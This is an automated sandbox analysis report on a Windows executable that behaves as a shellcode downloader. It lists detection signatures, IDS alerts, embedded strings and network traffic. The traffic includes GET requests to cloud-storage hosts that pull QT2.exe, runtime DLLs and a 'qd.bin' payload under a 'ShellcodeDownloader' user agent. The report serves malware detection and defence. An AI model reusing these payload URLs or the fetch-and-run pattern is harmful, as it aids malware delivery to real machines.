Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_78.exe

Overview

General Information

Sample name:LisectAVT_2403002B_78.exe
Analysis ID:1481572
MD5:89d61660f3e47a8a0f7ae37d5f8f03ed
SHA1:434a0f545d0aaafafc1bf5366f98187356e37a3a
SHA256:31c048f58d030f9c4ba84f5bf96ea182569b1d5468e41d9f3459b58a5df580b1
Tags:exe
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious sample
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LisectAVT_2403002B_78.exe (PID: 4800 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_78.exe" MD5: 89D61660F3E47A8A0F7AE37D5F8F03ED)
    • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched
Timestamp:2024-07-25T11:26:05.385881+0200
SID:2028371
Source Port:49725
Destination Port:443
Protocol:TCP
Classtype:Unknown Traffic
Timestamp:2024-07-25T11:26:28.058059+0200
SID:2022930
Source Port:443
Destination Port:49727
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T11:25:42.841407+0200
SID:2011803
Source Port:443
Destination Port:49714
Protocol:TCP
Classtype:Executable code was detected
Timestamp:2024-07-25T11:25:50.311485+0200
SID:2022930
Source Port:443
Destination Port:49717
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LisectAVT_2403002B_78.exeAvira: detected
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: LisectAVT_2403002B_78.exeJoe Sandbox ML: detected
Source: LisectAVT_2403002B_78.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 43.152.64.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: LisectAVT_2403002B_78.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\build\ob\bora-21772623\cayman_glib\glib\src\build\win32\vs14\Release\Win32\bin\gthread-2.0.pdb source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source: Binary string: C:\Users\Administrator\Documents\Project2\Project2\Release\Project2.pdb source: libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: I:\build\trunk_cn_9.0build\simulator\bin\dnmultiplayerex.pdb source: QT2[1].exe.0.dr, software.exe.0.dr
Source: Binary string: wab.pdbGCTL source: LisectAVT_2403002B_78.exe
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: wab.pdb source: LisectAVT_2403002B_78.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00ABDEF1 FindFirstFileExW,0_2_00ABDEF1
Source: Joe Sandbox ViewIP Address: 43.152.64.193 43.152.64.193
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /QT2.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /cximagecrt.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /libcurl.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AA31B0 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,0_2_00AA31B0
Source: global trafficHTTP traffic detected: GET /QT2.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /cximagecrt.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /libcurl.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /qd.bin HTTP/1.1User-Agent: ShellcodeDownloaderHost: wwwbin-1323571107.cos.ap-guangzhou.myqcloud.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: www80-1323570959.cos.ap-singapore.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.di
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: software.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: LisectAVT_2403002B_78.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.0000000000984000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://ocsp.digicert.com0H
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: LisectAVT_2403002B_78.exe, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, QT2[1].exe.0.dr, libcurl.dll.0.dr, software.exe.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: LisectAVT_2403002B_78.exe, cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: QT2[1].exe.0.dr, software.exe.0.drString found in binary or memory: http://www.google-analytics.com/collect?v=1&t=event&tid=UA-156197647-3&cid=%s&ec=%s&ea=%s&el=%s&ev=1
Source: cximagecrt[1].dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: http://www.ijg.org
Source: QT2[1].exe.0.dr, software.exe.0.drString found in binary or memory: https://HTTP/1.1
Source: QT2[1].exe.0.dr, software.exe.0.drString found in binary or memory: https://res.ldmnq.com/ld/leidianexmnq5mnq9https://res.ldmnq.com/download/release/ldinst9.0.exeldmnq9
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.0000000000984000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, cximagecrt[1].dll.0.dr, libcurl[1].dll.0.dr, libcurl.dll.0.dr, cximagecrt.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.0000000000989000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.0000000000989000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/&#_
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlld
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dllo
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/$p
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/Tp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/dp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/j
Source: LisectAVT_2403002B_78.exeString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin
Source: LisectAVT_2403002B_78.exeString found in binary or memory: https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binShellcodeDownloadererrorerrorerror
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.a
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqc
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322734496.0000000000966000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$p
